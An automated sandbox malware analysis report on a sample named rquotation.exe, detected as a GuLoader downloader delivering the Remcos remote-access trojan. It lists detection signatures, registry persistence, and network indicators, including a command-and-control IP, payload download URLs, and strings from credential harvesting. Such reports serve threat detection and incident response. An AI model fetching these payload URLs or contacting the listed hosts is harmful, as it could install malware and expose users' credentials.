Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rquotation.exe

Overview

General Information

Sample name:rquotation.exe
Analysis ID:1612743
MD5:35c34e6e68ec3f3abe65247dabaa92ac
SHA1:ea00abbc843585fe658c59c2c5a07b661acb7294
SHA256:ccf730b6af6f95df83d0ef459879ff64acc1aa68e3ec3bc4d721474698ae7c31
Tags:exeuser-Porcupine
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious PE digital signature
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • rquotation.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\rquotation.exe" MD5: 35C34E6E68EC3F3ABE65247DABAA92AC)
    • rquotation.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\rquotation.exe" MD5: 35C34E6E68EC3F3ABE65247DABAA92AC)
      • rquotation.exe (PID: 6568 cmdline: C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\wzmiqiwgxwogvchqnsa" MD5: 35C34E6E68EC3F3ABE65247DABAA92AC)
      • rquotation.exe (PID: 6980 cmdline: C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\hbrbjahaleglxiduwduflf" MD5: 35C34E6E68EC3F3ABE65247DABAA92AC)
      • rquotation.exe (PID: 4580 cmdline: C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\jvwtktsbhmyyhorygnhgokcbue" MD5: 35C34E6E68EC3F3ABE65247DABAA92AC)
  • Colonialises.exe (PID: 5368 cmdline: "C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exe" MD5: 35C34E6E68EC3F3ABE65247DABAA92AC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3275367033.00000000004BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.3281675400.0000000005FDF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000002.2996399559.0000000000563000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 7 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\rquotation.exe, ProcessId: 6512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Bridgets
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\rquotation.exe, ProcessId: 6512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Bridgets

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\rquotation.exe, ProcessId: 6512, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-12T06:03:03.489046+010020365941Malware Command and Control Activity Detected192.168.2.55943846.183.222.8549327TCP
              2025-02-12T06:03:04.707758+010020365941Malware Command and Control Activity Detected192.168.2.55943946.183.222.8549327TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-12T06:03:04.642338+010028033043Unknown Traffic192.168.2.559440178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-12T06:02:59.505154+010028032702Potentially Bad Traffic192.168.2.55943638.108.185.115443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: rquotation.exeAvira: detected
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeAvira: detection malicious, Label: HEUR/AGEN.1361137
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeVirustotal: Detection: 12%Perma Link
              Source: rquotation.exeVirustotal: Detection: 12%Perma Link
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3281675400.0000000005FDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: rquotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.5:59436 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.108.185.68:443 -> 192.168.2.5:59437 version: TLS 1.2
              Source: rquotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_0040559B
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_00405FFD FindFirstFileA,FindClose,4_2_00405FFD
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_00402688 FindFirstFileA,4_2_00402688
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040559B
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_374A10F1
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_374A6580
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_00405FFD FindFirstFileA,FindClose,8_2_00405FFD
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,8_2_0040559B
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_00402688 FindFirstFileA,8_2_00402688
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:59438 -> 46.183.222.85:49327
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:59439 -> 46.183.222.85:49327
              Source: global trafficTCP traffic: 46.183.222.85 ports 49327,2,3,4,7,9
              Source: global trafficTCP traffic: 192.168.2.5:59438 -> 46.183.222.85:49327
              Source: global trafficTCP traffic: 192.168.2.5:63134 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.5:59179 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:59440 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:59436 -> 38.108.185.115:443
              Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4MzBf/gdugm184.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIxNzQ4MzBf?temp_key=%81%DB%A0%9B_8n%29&inline=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: web.opendrive.comConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: unknownTCP traffic detected without corresponding DNS query: 46.183.222.85
              Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4MzBf/gdugm184.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIxNzQ4MzBf?temp_key=%81%DB%A0%9B_8n%29&inline=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: web.opendrive.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: rquotation.exe, 00000004.00000002.3303223061.0000000037470000.00000040.10000000.00040000.00000000.sdmp, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: rquotation.exe, 00000005.00000003.3196880485.0000000000AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: rquotation.exe, 00000005.00000003.3196880485.0000000000AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: rquotation.exe, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: rquotation.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: rquotation.exe, 00000004.00000002.3303086999.0000000037360000.00000040.10000000.00040000.00000000.sdmp, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: rquotation.exe, 00000004.00000002.3303086999.0000000037360000.00000040.10000000.00040000.00000000.sdmp, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: od.lk
              Source: global trafficDNS traffic detected: DNS query: web.opendrive.com
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: rquotation.exe, 00000004.00000003.3178549304.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3167759582.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282509675.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3178887574.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3177734571.000000000642E000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3179933606.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3198030667.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3180610529.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3197521207.0000000006439000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3180728290.0000000006433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282295810.0000000006378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpD
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpu
              Source: Colonialises.exe, Colonialises.exe, 00000008.00000002.3275125198.0000000000409000.00000004.00000001.01000000.0000000B.sdmp, Colonialises.exe, 00000008.00000000.3224746625.0000000000409000.00000008.00000001.01000000.0000000B.sdmp, rquotation.exe, Colonialises.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: rquotation.exe, Colonialises.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: rquotation.exe, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: rquotation.exe, rquotation.exe, 00000007.00000003.3182970804.000000000087D000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000007.00000003.3183004702.000000000087D000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: rquotation.exe, 00000007.00000003.3182970804.000000000087D000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000007.00000003.3183004702.000000000087D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: rquotation.exe, 00000004.00000002.3303223061.0000000037470000.00000040.10000000.00040000.00000000.sdmp, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: rquotation.exe, 00000004.00000002.3303223061.0000000037470000.00000040.10000000.00040000.00000000.sdmp, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: bhv1B9B.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
              Source: rquotation.exe, 00000005.00000002.3197234359.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
